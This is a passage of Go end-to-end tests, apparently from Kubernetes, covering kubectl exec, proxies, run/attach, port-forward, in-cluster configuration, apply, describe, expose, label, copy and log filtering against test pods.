execOutput = framework.RunKubectlOrDie("exec", fmt.Sprintf("--namespace=%v", ns), simplePodName, "echo", string(veryLongData))
Expect(string(veryLongData)).To(Equal(strings.TrimSpace(execOutput)), "Unexpected kubectl exec output")
By("executing a command in the container with noninteractive stdin")
execOutput = framework.NewKubectlCommand("exec", fmt.Sprintf("--namespace=%v", ns), "-i", simplePodName, "cat").
WithStdinData("abcd1234").
ExecOrDie()
if e, a := "abcd1234", execOutput; e != a {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", e, a)
}
// pretend that we're a user in an interactive shell
r, closer, err := newBlockingReader("echo hi\nexit\n")
if err != nil {
framework.Failf("Error creating blocking reader: %v", err)
}
// NOTE this is solely for test cleanup!
defer closer.Close()
By("executing a command in the container with pseudo-interactive stdin")
execOutput = framework.NewKubectlCommand("exec", fmt.Sprintf("--namespace=%v", ns), "-i", simplePodName, "sh").
WithStdinReader(r).
ExecOrDie()
if e, a := "hi", strings.TrimSpace(execOutput); e != a {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", e, a)
}
})
It("should support exec through an HTTP proxy", func() {
// Fail if the variable isn't set
if framework.TestContext.Host == "" {
framework.Failf("--host variable must be set to the full URI to the api server on e2e run.")
}
By("Starting goproxy")
testSrv, proxyLogs := startLocalProxy()
defer testSrv.Close()
proxyAddr := testSrv.URL
for _, proxyVar := range []string{"https_proxy", "HTTPS_PROXY"} {
proxyLogs.Reset()
By("Running kubectl via an HTTP proxy using " + proxyVar)
output := framework.NewKubectlCommand(fmt.Sprintf("--namespace=%s", ns), "exec", "nginx", "echo", "running", "in", "container").
WithEnv(append(os.Environ(), fmt.Sprintf("%s=%s", proxyVar, proxyAddr))).
ExecOrDie()
// Verify we got the normal output captured by the exec server
expectedExecOutput := "running in container\n"
if output != expectedExecOutput {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", expectedExecOutput, output)
}
// Verify the proxy server logs saw the connection
expectedProxyLog := fmt.Sprintf("Accepting CONNECT to %s", strings.TrimSuffix(strings.TrimPrefix(framework.TestContext.Host, "https://"), "/api"))
proxyLog := proxyLogs.String()
if !strings.Contains(proxyLog, expectedProxyLog) {
framework.Failf("Missing expected log result on proxy server for %s. Expected: %q, got %q", proxyVar, expectedProxyLog, proxyLog)
}
}
})
It("should support exec through kubectl proxy", func() {
// Fail if the variable isn't set
if framework.TestContext.Host == "" {
framework.Failf("--host variable must be set to the full URI to the api server on e2e run.")
}
By("Starting kubectl proxy")
port, proxyCmd, err := startProxyServer()
framework.ExpectNoError(err)
defer framework.TryKill(proxyCmd)
//proxyLogs.Reset()
host := fmt.Sprintf("--server=http://127.0.0.1:%d", port)
By("Running kubectl via kubectl proxy using " + host)
output := framework.NewKubectlCommand(
host, fmt.Sprintf("--namespace=%s", ns),
"exec", "nginx", "echo", "running", "in", "container",
).ExecOrDie()
// Verify we got the normal output captured by the exec server
expectedExecOutput := "running in container\n"
if output != expectedExecOutput {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", expectedExecOutput, output)
}
})
It("should return command exit codes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("execing into a container with a successful command")
_, err := framework.NewKubectlCommand(nsFlag, "exec", "nginx", "--", "/bin/sh", "-c", "exit 0").Exec()
framework.ExpectNoError(err)
By("execing into a container with a failing command")
_, err = framework.NewKubectlCommand(nsFlag, "exec", "nginx", "--", "/bin/sh", "-c", "exit 42").Exec()
ee, ok := err.(uexec.ExitError)
Expect(ok).To(Equal(true))
Expect(ee.ExitStatus()).To(Equal(42))
By("running a successful command")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=Never", "success", "--", "/bin/sh", "-c", "exit 0").Exec()
framework.ExpectNoError(err)
By("running a failing command")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=Never", "failure-1", "--", "/bin/sh", "-c", "exit 42").Exec()
ee, ok = err.(uexec.ExitError)
Expect(ok).To(Equal(true))
Expect(ee.ExitStatus()).To(Equal(42))
By("running a failing command without --restart=Never")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=OnFailure", "failure-2", "--", "/bin/sh", "-c", "cat && exit 42").
WithStdinData("abcd1234").
Exec()
framework.ExpectNoError(err)
By("running a failing command without --restart=Never, but with --rm")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=OnFailure", "--rm", "failure-3", "--", "/bin/sh", "-c", "cat && exit 42").
WithStdinData("abcd1234").
Exec()
framework.ExpectNoError(err)
framework.WaitForPodToDisappear(f.ClientSet, ns, "failure-3", labels.Everything(), 2*time.Second, wait.ForeverTestTimeout)
By("running a failing command with --leave-stdin-open")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=Never", "failure-4", "--leave-stdin-open", "--", "/bin/sh", "-c", "exit 42").
WithStdinData("abcd1234").
Exec()
framework.ExpectNoError(err)
})
It("should support inline execution and attach", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("executing a command with run and attach with stdin")
runOutput := framework.NewKubectlCommand(nsFlag, "run", "run-test", "--image="+busyboxImage, "--restart=OnFailure", "--attach=true", "--stdin", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234").
ExecOrDie()
Expect(runOutput).To(ContainSubstring("abcd1234"))
Expect(runOutput).To(ContainSubstring("stdin closed"))
Expect(c.BatchV1().Jobs(ns).Delete("run-test", nil)).To(BeNil())
By("executing a command with run and attach without stdin")
runOutput = framework.NewKubectlCommand(fmt.Sprintf("--namespace=%v", ns), "run", "run-test-2", "--image="+busyboxImage, "--restart=OnFailure", "--attach=true", "--leave-stdin-open=true", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234").
ExecOrDie()
Expect(runOutput).ToNot(ContainSubstring("abcd1234"))
Expect(runOutput).To(ContainSubstring("stdin closed"))
Expect(c.BatchV1().Jobs(ns).Delete("run-test-2", nil)).To(BeNil())
By("executing a command with run and attach with stdin with open stdin should remain running")
runOutput = framework.NewKubectlCommand(nsFlag, "run", "run-test-3", "--image="+busyboxImage, "--restart=OnFailure", "--attach=true", "--leave-stdin-open=true", "--stdin", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234\n").
ExecOrDie()
Expect(runOutput).ToNot(ContainSubstring("stdin closed"))
g := func(pods []*v1.Pod) sort.Interface { return sort.Reverse(controller.ActivePods(pods)) }
runTestPod, _, err := polymorphichelpers.GetFirstPod(f.ClientSet.CoreV1(), ns, "run=run-test-3", 1*time.Minute, g)
if err != nil {
os.Exit(1)
}
if !framework.CheckPodsRunningReady(c, ns, []string{runTestPod.Name}, time.Minute) {
framework.Failf("Pod %q of Job %q should still be running", runTestPod.Name, "run-test-3")
}
// NOTE: we cannot guarantee our output showed up in the container logs before stdin was closed, so we have
// to poll in a loop.
err = wait.PollImmediate(time.Second, time.Minute, func() (bool, error) {
if !framework.CheckPodsRunningReady(c, ns, []string{runTestPod.Name}, 1*time.Second) {
framework.Failf("Pod %q of Job %q should still be running", runTestPod.Name, "run-test-3")
}
logOutput := framework.RunKubectlOrDie(nsFlag, "logs", runTestPod.Name)
Expect(logOutput).ToNot(ContainSubstring("stdin closed"))
return strings.Contains(logOutput, "abcd1234"), nil
})
if err != nil {
os.Exit(1)
}
Expect(err).To(BeNil())
Expect(c.BatchV1().Jobs(ns).Delete("run-test-3", nil)).To(BeNil())
})
It("should support port-forward", func() {
By("forwarding the container port to a local port")
cmd := runPortForward(ns, simplePodName, simplePodPort)
defer cmd.Stop()
By("curling local port output")
localAddr := fmt.Sprintf("http://localhost:%d", cmd.port)
body, err := curl(localAddr)
framework.Logf("got: %s", body)
if err != nil {
framework.Failf("Failed http.Get of forwarded port (%s): %v", localAddr, err)
}
if !strings.Contains(body, nginxDefaultOutput) {
framework.Failf("Container port output missing expected value. Wanted:'%s', got: %s", nginxDefaultOutput, body)
}
})
It("should handle in-cluster config", func() {
By("adding rbac permissions")
// grant the view permission widely to allow inspection of the `invalid` namespace and the default namespace
framework.BindClusterRole(f.ClientSet.RbacV1beta1(), "view", f.Namespace.Name,
rbacv1beta1.Subject{Kind: rbacv1beta1.ServiceAccountKind, Namespace: f.Namespace.Name, Name: "default"})
err := framework.WaitForAuthorizationUpdate(f.ClientSet.AuthorizationV1beta1(),
serviceaccount.MakeUsername(f.Namespace.Name, "default"),
f.Namespace.Name, "list", schema.GroupResource{Resource: "pods"}, true)
framework.ExpectNoError(err)
By("overriding icc with values provided by flags")
kubectlPath := framework.TestContext.KubectlPath
// we need the actual kubectl binary, not the script wrapper
kubectlPathNormalizer := exec.Command("which", kubectlPath)
if strings.HasSuffix(kubectlPath, "kubectl.sh") {
kubectlPathNormalizer = exec.Command(kubectlPath, "path")
}
kubectlPathNormalized, err := kubectlPathNormalizer.Output()
framework.ExpectNoError(err)
kubectlPath = strings.TrimSpace(string(kubectlPathNormalized))
inClusterHost := strings.TrimSpace(framework.RunHostCmdOrDie(ns, simplePodName, "printenv KUBERNETES_SERVICE_HOST"))
inClusterPort := strings.TrimSpace(framework.RunHostCmdOrDie(ns, simplePodName, "printenv KUBERNETES_SERVICE_PORT"))
framework.Logf("copying %s to the %s pod", kubectlPath, simplePodName)
framework.RunKubectlOrDie("cp", kubectlPath, ns+"/"+simplePodName+":/tmp/")
// Build a kubeconfig file that will make use of the injected ca and token,
// but point at the DNS host and the default namespace
tmpDir, err := ioutil.TempDir("", "icc-override")
overrideKubeconfigName := "icc-override.kubeconfig"
framework.ExpectNoError(err)
defer func() { os.Remove(tmpDir) }()
framework.ExpectNoError(ioutil.WriteFile(filepath.Join(tmpDir, overrideKubeconfigName), []byte(`
kind: Config
apiVersion: v1
clusters:
- cluster:
api-version: v1
server: https://kubernetes.default.svc:443
certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
name: kubeconfig-cluster
contexts:
- context:
cluster: kubeconfig-cluster
namespace: default
user: kubeconfig-user
name: kubeconfig-context
current-context: kubeconfig-context
users:
- name: kubeconfig-user
user:
tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
`), os.FileMode(0755)))
framework.Logf("copying override kubeconfig to the %s pod", simplePodName)
framework.RunKubectlOrDie("cp", filepath.Join(tmpDir, overrideKubeconfigName), ns+"/"+simplePodName+":/tmp/")
framework.ExpectNoError(ioutil.WriteFile(filepath.Join(tmpDir, "invalid-configmap-with-namespace.yaml"), []byte(`
kind: ConfigMap
apiVersion: v1
metadata:
name: "configmap with namespace and invalid name"
namespace: configmap-namespace
`), os.FileMode(0755)))
framework.ExpectNoError(ioutil.WriteFile(filepath.Join(tmpDir, "invalid-configmap-without-namespace.yaml"), []byte(`
kind: ConfigMap
apiVersion: v1
metadata:
name: "configmap without namespace and invalid name"
`), os.FileMode(0755)))
framework.Logf("copying configmap manifests to the %s pod", simplePodName)
framework.RunKubectlOrDie("cp", filepath.Join(tmpDir, "invalid-configmap-with-namespace.yaml"), ns+"/"+simplePodName+":/tmp/")
framework.RunKubectlOrDie("cp", filepath.Join(tmpDir, "invalid-configmap-without-namespace.yaml"), ns+"/"+simplePodName+":/tmp/")
By("getting pods with in-cluster configs")
execOutput := framework.RunHostCmdOrDie(ns, simplePodName, "/tmp/kubectl get pods --v=6 2>&1")
Expect(execOutput).To(MatchRegexp("nginx +1/1 +Running"))
Expect(execOutput).To(ContainSubstring("Using in-cluster namespace"))
Expect(execOutput).To(ContainSubstring("Using in-cluster configuration"))
By("creating an object containing a namespace with in-cluster config")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl create -f /tmp/invalid-configmap-with-namespace.yaml --v=6 2>&1")
Expect(err).To(ContainSubstring("Using in-cluster namespace"))
Expect(err).To(ContainSubstring("Using in-cluster configuration"))
Expect(err).To(ContainSubstring(fmt.Sprintf("POST https://%s:%s/api/v1/namespaces/configmap-namespace/configmaps", inClusterHost, inClusterPort)))
By("creating an object not containing a namespace with in-cluster config")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl create -f /tmp/invalid-configmap-without-namespace.yaml --v=6 2>&1")
Expect(err).To(ContainSubstring("Using in-cluster namespace"))
Expect(err).To(ContainSubstring("Using in-cluster configuration"))
Expect(err).To(ContainSubstring(fmt.Sprintf("POST https://%s:%s/api/v1/namespaces/%s/configmaps", inClusterHost, inClusterPort, f.Namespace.Name)))
By("trying to use kubectl with invalid token")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl get pods --token=invalid --v=7 2>&1")
framework.Logf("got err %v", err)
Expect(err).To(HaveOccurred())
Expect(err).To(ContainSubstring("Using in-cluster namespace"))
Expect(err).To(ContainSubstring("Using in-cluster configuration"))
Expect(err).To(ContainSubstring("Authorization: Bearer invalid"))
Expect(err).To(ContainSubstring("Response Status: 401 Unauthorized"))
By("trying to use kubectl with invalid server")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl get pods --server=invalid --v=6 2>&1")
framework.Logf("got err %v", err)
Expect(err).To(HaveOccurred())
Expect(err).To(ContainSubstring("Unable to connect to the server"))
Expect(err).To(ContainSubstring("GET http://invalid/api"))
By("trying to use kubectl with invalid namespace")
execOutput = framework.RunHostCmdOrDie(ns, simplePodName, "/tmp/kubectl get pods --namespace=invalid --v=6 2>&1")
Expect(execOutput).To(ContainSubstring("No resources found"))
Expect(execOutput).ToNot(ContainSubstring("Using in-cluster namespace"))
Expect(execOutput).To(ContainSubstring("Using in-cluster configuration"))
Expect(execOutput).To(MatchRegexp(fmt.Sprintf("GET http[s]?://%s:%s/api/v1/namespaces/invalid/pods", inClusterHost, inClusterPort)))
By("trying to use kubectl with kubeconfig")
execOutput = framework.RunHostCmdOrDie(ns, simplePodName, "/tmp/kubectl get pods --kubeconfig=/tmp/"+overrideKubeconfigName+" --v=6 2>&1")
Expect(execOutput).ToNot(ContainSubstring("Using in-cluster namespace"))
Expect(execOutput).ToNot(ContainSubstring("Using in-cluster configuration"))
Expect(execOutput).To(ContainSubstring("GET https://kubernetes.default.svc:443/api/v1/namespaces/default/pods"))
})
})
framework.KubeDescribe("Kubectl api-versions", func() {
/*
Release : v1.9
Testname: Kubectl, check version v1
Description: Run kubectl to get api versions, output MUST contain returned versions with ‘v1’ listed.
*/
framework.ConformanceIt("should check if v1 is in available api versions ", func() {
By("validating api versions")
output := framework.RunKubectlOrDie("api-versions")
if !strings.Contains(output, "v1") {
framework.Failf("No v1 in kubectl api-versions")
}
})
})
framework.KubeDescribe("Kubectl apply", func() {
It("should apply a new configuration to an existing RC", func() {
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("creating Redis RC")
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
By("applying a modified configuration")
stdin := modifyReplicationControllerConfiguration(controllerJson)
framework.NewKubectlCommand("apply", "-f", "-", nsFlag).
WithStdinReader(stdin).
ExecOrDie()
By("checking the result")
forEachReplicationController(c, ns, "app", "redis", validateReplicationControllerConfiguration)
})
It("should reuse port when apply to an existing SVC", func() {
serviceJson := readTestFileOrDie(redisServiceFilename)
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("creating Redis SVC")
framework.RunKubectlOrDieInput(string(serviceJson[:]), "create", "-f", "-", nsFlag)
By("getting the original port")
originalNodePort := framework.RunKubectlOrDie("get", "service", "redis-master", nsFlag, "-o", "jsonpath={.spec.ports[0].port}")
By("applying the same configuration")
framework.RunKubectlOrDieInput(string(serviceJson[:]), "apply", "-f", "-", nsFlag)
By("getting the port after applying configuration")
currentNodePort := framework.RunKubectlOrDie("get", "service", "redis-master", nsFlag, "-o", "jsonpath={.spec.ports[0].port}")
By("checking the result")
if originalNodePort != currentNodePort {
framework.Failf("port should keep the same")
}
})
It("apply set/view last-applied", func() {
deployment1Yaml := substituteImageName(string(readTestFileOrDie(nginxDeployment1Filename)))
deployment2Yaml := substituteImageName(string(readTestFileOrDie(nginxDeployment2Filename)))
deployment3Yaml := substituteImageName(string(readTestFileOrDie(nginxDeployment3Filename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("deployment replicas number is 2")
framework.RunKubectlOrDieInput(deployment1Yaml, "apply", "-f", "-", nsFlag)
By("check the last-applied matches expectations annotations")
output := framework.RunKubectlOrDieInput(deployment1Yaml, "apply", "view-last-applied", "-f", "-", nsFlag, "-o", "json")
requiredString := "\"replicas\": 2"
if !strings.Contains(output, requiredString) {
framework.Failf("Missing %s in kubectl view-last-applied", requiredString)
}
By("apply file doesn't have replicas")
framework.RunKubectlOrDieInput(deployment2Yaml, "apply", "set-last-applied", "-f", "-", nsFlag)
By("check last-applied has been updated, annotations doesn't have replicas")
output = framework.RunKubectlOrDieInput(deployment1Yaml, "apply", "view-last-applied", "-f", "-", nsFlag, "-o", "json")
requiredString = "\"replicas\": 2"
if strings.Contains(output, requiredString) {
framework.Failf("Presenting %s in kubectl view-last-applied", requiredString)
}
By("scale set replicas to 3")
nginxDeploy := "nginx-deployment"
debugDiscovery()
framework.RunKubectlOrDie("scale", "deployment", nginxDeploy, "--replicas=3", nsFlag)
By("apply file doesn't have replicas but image changed")
framework.RunKubectlOrDieInput(deployment3Yaml, "apply", "-f", "-", nsFlag)
By("verify replicas still is 3 and image has been updated")
output = framework.RunKubectlOrDieInput(deployment3Yaml, "get", "-f", "-", nsFlag, "-o", "json")
requiredItems := []string{"\"replicas\": 3", imageutils.GetE2EImage(imageutils.Nginx)}
for _, item := range requiredItems {
if !strings.Contains(output, item) {
framework.Failf("Missing %s in kubectl apply", item)
}
}
})
})
framework.KubeDescribe("Kubectl cluster-info", func() {
/*
Release : v1.9
Testname: Kubectl, cluster info
Description: Call kubectl to get cluster-info, output MUST contain cluster-info returned and Kubernetes Master SHOULD be running.
*/
framework.ConformanceIt("should check if Kubernetes master services is included in cluster-info ", func() {
By("validating cluster-info")
output := framework.RunKubectlOrDie("cluster-info")
// Can't check exact strings due to terminal control commands (colors)
requiredItems := []string{"Kubernetes master", "is running at"}
for _, item := range requiredItems {
if !strings.Contains(output, item) {
framework.Failf("Missing %s in kubectl cluster-info", item)
}
}
})
})
framework.KubeDescribe("Kubectl cluster-info dump", func() {
It("should check if cluster-info dump succeeds", func() {
By("running cluster-info dump")
framework.RunKubectlOrDie("cluster-info", "dump")
})
})
framework.KubeDescribe("Kubectl describe", func() {
/*
Release : v1.9
Testname: Kubectl, describe pod or rc
Description: Deploy a redis controller and a redis service. Kubectl describe pods SHOULD return the name, namespace, labels, state and other information as expected. Kubectl describe on rc, service, node and namespace SHOULD also return proper information.
*/
framework.ConformanceIt("should check if kubectl describe prints relevant information for rc and pods ", func() {
kv, err := framework.KubectlVersion()
Expect(err).NotTo(HaveOccurred())
framework.SkipUnlessServerVersionGTE(kv, c.Discovery())
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
serviceJson := readTestFileOrDie(redisServiceFilename)
nsFlag := fmt.Sprintf("--namespace=%v", ns)
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
framework.RunKubectlOrDieInput(string(serviceJson[:]), "create", "-f", "-", nsFlag)
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
// Pod
forEachPod(func(pod v1.Pod) {
output := framework.RunKubectlOrDie("describe", "pod", pod.Name, nsFlag)
requiredStrings := [][]string{
{"Name:", "redis-master-"},
{"Namespace:", ns},
{"Node:"},
{"Labels:", "app=redis"},
{"role=master"},
{"Annotations:"},
{"Status:", "Running"},
{"IP:"},
{"Controlled By:", "ReplicationController/redis-master"},
{"Image:", redisImage},
{"State:", "Running"},
{"QoS Class:", "BestEffort"},
}
checkOutput(output, requiredStrings)
})
// Rc
requiredStrings := [][]string{
{"Name:", "redis-master"},
{"Namespace:", ns},
{"Selector:", "app=redis,role=master"},
{"Labels:", "app=redis"},
{"role=master"},
{"Annotations:"},
{"Replicas:", "1 current", "1 desired"},
{"Pods Status:", "1 Running", "0 Waiting", "0 Succeeded", "0 Failed"},
{"Pod Template:"},
{"Image:", redisImage},
{"Events:"}}
checkKubectlOutputWithRetry(requiredStrings, "describe", "rc", "redis-master", nsFlag)
// Service
output := framework.RunKubectlOrDie("describe", "service", "redis-master", nsFlag)
requiredStrings = [][]string{
{"Name:", "redis-master"},
{"Namespace:", ns},
{"Labels:", "app=redis"},
{"role=master"},
{"Annotations:"},
{"Selector:", "app=redis", "role=master"},
{"Type:", "ClusterIP"},
{"IP:"},
{"Port:", "<unset>", "6379/TCP"},
{"Endpoints:"},
{"Session Affinity:", "None"}}
checkOutput(output, requiredStrings)
// Node
// It should be OK to list unschedulable Nodes here.
nodes, err := c.CoreV1().Nodes().List(metav1.ListOptions{})
Expect(err).NotTo(HaveOccurred())
node := nodes.Items[0]
output = framework.RunKubectlOrDie("describe", "node", node.Name)
requiredStrings = [][]string{
{"Name:", node.Name},
{"Labels:"},
{"Annotations:"},
{"CreationTimestamp:"},
{"Conditions:"},
{"Type", "Status", "LastHeartbeatTime", "LastTransitionTime", "Reason", "Message"},
{"Addresses:"},
{"Capacity:"},
{"Version:"},
{"Kernel Version:"},
{"OS Image:"},
{"Container Runtime Version:"},
{"Kubelet Version:"},
{"Kube-Proxy Version:"},
{"Pods:"}}
checkOutput(output, requiredStrings)
// Namespace
output = framework.RunKubectlOrDie("describe", "namespace", ns)
requiredStrings = [][]string{
{"Name:", ns},
{"Labels:"},
{"Annotations:"},
{"Status:", "Active"}}
checkOutput(output, requiredStrings)
// Quota and limitrange are skipped for now.
})
})
framework.KubeDescribe("Kubectl expose", func() {
/*
Release : v1.9
Testname: Kubectl, create service, replication controller
Description: Create a Pod running redis master listening to port 6379. Using kubectl expose the redis master replication controller at port 1234. Validate that the replication controller is listening on port 1234 and the target port is set to 6379, the port that redis master is listening on. Using kubectl expose the redis master as a service at port 2345. The service MUST be listening on port 2345 with the target port set to 6379, the port that redis master is listening on.
*/
framework.ConformanceIt("should create services for rc ", func() {
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
redisPort := 6379
By("creating Redis RC")
framework.Logf("namespace %v", ns)
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
// It may take a while for the pods to get registered in some cases, wait to be sure.
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
forEachPod(func(pod v1.Pod) {
framework.Logf("wait on redis-master startup in %v ", ns)
framework.LookForStringInLog(ns, pod.Name, "redis-master", "The server is now ready to accept connections", framework.PodStartTimeout)
})
validateService := func(name string, servicePort int, timeout time.Duration) {
err := wait.Poll(framework.Poll, timeout, func() (bool, error) {
endpoints, err := c.CoreV1().Endpoints(ns).Get(name, metav1.GetOptions{})
if err != nil {
// log the real error
framework.Logf("Get endpoints failed (interval %v): %v", framework.Poll, err)
// if the error is API not found or could not find default credentials or TLS handshake timeout, try again
if apierrs.IsNotFound(err) ||
apierrs.IsUnauthorized(err) ||
apierrs.IsServerTimeout(err) {
err = nil
}
return false, err
}
uidToPort := framework.GetContainerPortsByPodUID(endpoints)
if len(uidToPort) == 0 {
framework.Logf("No endpoint found, retrying")
return false, nil
}
if len(uidToPort) > 1 {
framework.Failf("Too many endpoints found")
}
for _, port := range uidToPort {
if port[0] != redisPort {
framework.Failf("Wrong endpoint port: %d", port[0])
}
}
return true, nil
})
Expect(err).NotTo(HaveOccurred())
service, err := c.CoreV1().Services(ns).Get(name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
if len(service.Spec.Ports) != 1 {
framework.Failf("1 port is expected")
}
port := service.Spec.Ports[0]
if port.Port != int32(servicePort) {
framework.Failf("Wrong service port: %d", port.Port)
}
if port.TargetPort.IntValue() != redisPort {
framework.Failf("Wrong target port: %d", port.TargetPort.IntValue())
}
}
By("exposing RC")
framework.RunKubectlOrDie("expose", "rc", "redis-master", "--name=rm2", "--port=1234", fmt.Sprintf("--target-port=%d", redisPort), nsFlag)
framework.WaitForService(c, ns, "rm2", true, framework.Poll, framework.ServiceStartTimeout)
validateService("rm2", 1234, framework.ServiceStartTimeout)
By("exposing service")
framework.RunKubectlOrDie("expose", "service", "rm2", "--name=rm3", "--port=2345", fmt.Sprintf("--target-port=%d", redisPort), nsFlag)
framework.WaitForService(c, ns, "rm3", true, framework.Poll, framework.ServiceStartTimeout)
validateService("rm3", 2345, framework.ServiceStartTimeout)
})
})
framework.KubeDescribe("Kubectl label", func() {
var podYaml string
var nsFlag string
BeforeEach(func() {
By("creating the pod")
podYaml = substituteImageName(string(readTestFileOrDie("pause-pod.yaml.in")))
nsFlag = fmt.Sprintf("--namespace=%v", ns)
framework.RunKubectlOrDieInput(podYaml, "create", "-f", "-", nsFlag)
Expect(framework.CheckPodsRunningReady(c, ns, []string{pausePodName}, framework.PodStartTimeout)).To(BeTrue())
})
AfterEach(func() {
cleanupKubectlInputs(podYaml, ns, pausePodSelector)
})
/*
Release : v1.9
Testname: Kubectl, label update
Description: When a Pod is running, update a Label using the ‘kubectl label’ command. The label MUST be created in the Pod. A ‘kubectl get pod’ with -l option on the container MUST verify that the label can be read back. Use ‘kubectl label label-’ to remove the label. ‘Kubectl get pod’ with -l option SHOULD not list the deleted label as the label is removed.
*/
framework.ConformanceIt("should update the label on a resource ", func() {
labelName := "testing-label"
labelValue := "testing-label-value"
By("adding the label " + labelName + " with value " + labelValue + " to a pod")
framework.RunKubectlOrDie("label", "pods", pausePodName, labelName+"="+labelValue, nsFlag)
By("verifying the pod has the label " + labelName + " with the value " + labelValue)
output := framework.RunKubectlOrDie("get", "pod", pausePodName, "-L", labelName, nsFlag)
if !strings.Contains(output, labelValue) {
framework.Failf("Failed updating label " + labelName + " to the pod " + pausePodName)
}
By("removing the label " + labelName + " of a pod")
framework.RunKubectlOrDie("label", "pods", pausePodName, labelName+"-", nsFlag)
By("verifying the pod doesn't have the label " + labelName)
output = framework.RunKubectlOrDie("get", "pod", pausePodName, "-L", labelName, nsFlag)
if strings.Contains(output, labelValue) {
framework.Failf("Failed removing label " + labelName + " of the pod " + pausePodName)
}
})
})
framework.KubeDescribe("Kubectl copy", func() {
var podYaml string
var nsFlag string
BeforeEach(func() {
By("creating the pod")
nsFlag = fmt.Sprintf("--namespace=%v", ns)
podYaml = substituteImageName(string(readTestFileOrDie("busybox-pod.yaml")))
framework.RunKubectlOrDieInput(podYaml, "create", "-f", "-", nsFlag)
Expect(framework.CheckPodsRunningReady(c, ns, []string{busyboxPodName}, framework.PodStartTimeout)).To(BeTrue())
})
AfterEach(func() {
cleanupKubectlInputs(podYaml, ns, busyboxPodSelector)
})
/*
Release : v1.12
Testname: Kubectl, copy
Description: When a Pod is running, copy a known file from it to a temporary local destination.
*/
It("should copy a file from a running Pod", func() {
remoteContents := "foobar\n"
podSource := fmt.Sprintf("%s:/root/foo/bar/foo.bar", busyboxPodName)
tempDestination, err := ioutil.TempFile(os.TempDir(), "copy-foobar")
if err != nil {
framework.Failf("Failed creating temporary destination file: %v", err)
}
By("specifying a remote filepath " + podSource + " on the pod")
framework.RunKubectlOrDie("cp", podSource, tempDestination.Name(), nsFlag)
By("verifying that the contents of the remote file " + podSource + " have been copied to a local file " + tempDestination.Name())
localData, err := ioutil.ReadAll(tempDestination)
if err != nil {
framework.Failf("Failed reading temporary local file: %v", err)
}
if string(localData) != remoteContents {
framework.Failf("Failed copying remote file contents. Expected %s but got %s", remoteContents, string(localData))
}
})
})
framework.KubeDescribe("Kubectl logs", func() {
var nsFlag string
var rc string
containerName := "redis-master"
BeforeEach(func() {
By("creating an rc")
rc = substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag = fmt.Sprintf("--namespace=%v", ns)
framework.RunKubectlOrDieInput(rc, "create", "-f", "-", nsFlag)
})
AfterEach(func() {
cleanupKubectlInputs(rc, ns, simplePodSelector)
})
/*
Release : v1.9
Testname: Kubectl, logs
Description: When a Pod is running it MUST generate logs.
A started Pod should have a log line indicating the server is running and ready to accept connections. The log command options MUST also work as expected and described below.
‘kubectl log --tail=1’ should generate an output of one line, the last line in the log.
‘kubectl log --limit-bytes=1’ should generate a single-byte output.
‘kubectl log --tail=1 --timestamps’ should generate one line with a timestamp in RFC3339 format.
‘kubectl log --since=1s’ should output only logs that are at most 1 second old.
‘kubectl log --since=24h’ should output only logs that are at most 1 day old.
*/
framework.ConformanceIt("should be able to retrieve and filter logs ", func() {
// Split("something\n", "\n") returns ["something", ""], so
// strip trailing newline first
lines := func(out string) []string {
return strings.Split(strings.TrimRight(out, "\n"), "\n")
}
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
forEachPod(func(pod v1.Pod) {
By("checking for a matching strings")
_, err := framework.LookForStringInLog(ns, pod.Name, containerName, "The server is now ready to accept connections", framework.PodStartTimeout)
Expect(err).NotTo(HaveOccurred())
By("limiting log lines")
out := framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--tail=1")
Expect(len(out)).NotTo(BeZero())
Expect(len(lines(out))).To(Equal(1))
By("limiting log bytes")
out = framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--limit-bytes=1")
Expect(len(lines(out))).To(Equal(1))
Expect(len(out)).To(Equal(1))
By("exposing timestamps")
out = framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--tail=1", "--timestamps")
l := lines(out)
Expect(len(l)).To(Equal(1))
words := strings.Split(l[0], " ")
Expect(len(words)).To(BeNumerically(">", 1))
if _, err := time.Parse(time.RFC3339Nano, words[0]); err != nil {
if _, err := time.Parse(time.RFC3339, words[0]); err != nil {
